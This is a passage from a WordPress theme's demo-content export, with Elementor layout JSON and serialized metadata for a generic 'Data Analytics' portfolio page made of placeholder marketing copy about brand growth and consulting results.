growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"f9c6721","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#52C5B6","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"eeb45e7","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"89cdc33","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"d52cf56","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3039bed","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"5b53fd7","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"24ffea9","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"36ccc29","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"950bc90","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"090ef75","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"2bc9bd6","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2a92981","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"57664ea","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"cad05d6","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"8f04022","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e555b74","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"7c793e2","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"410d2fb","elType":"widget","settings":{"editor":"A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.\n\nWe helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #52C5B6;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"9173735","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"e010b06","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-values-home-5.png","id":2364},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"f47cb90","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Data Analytics</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio/data-analytics/</link>
		<pubDate>Fri, 11 Sep 2020 07:08:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=826</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>March 26, 2019</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.
We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-values-home-5-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>826</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:08:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:08:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[data-analytics]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="startup"><![CDATA[startup]]></category>
		<category domain="portfolio_cat" nicename="strategy"><![CDATA[strategy]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[827]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"4ff3a9c5","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"41414446","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"7cea63e4","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"17a99080","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"277d3a66","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"731b7798","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"1ccb559a","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"889c447","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"27258f6a","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5c1d64ba","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"677ece23","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"427fc382","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6b572066","elType":"widget","settings":{"editor":"<p>March 26, 2019<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"18475bca","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"9fa30e6","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"44bd3c29","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"4348fe38","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"5fa0d94e","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"4b302ff","elType":"section","settings":[],"elements":[{"id":"6f68216","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"9f01277","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"f957a81","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"024278c","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#52C5B6","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"8fe3a4e","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"744dd7f","elType":"widget","settings":{"title":"<span style=\"color:#52C5B6\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"a4fa04b","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"5136f30","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"bf13429","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"12a583f","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"647fc19","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"8fba55f","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"0b06b9c","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"939f562","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"d742489","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"434a9c0","elType":"widget","settings":{"bar_style":"circle","title":"corporate 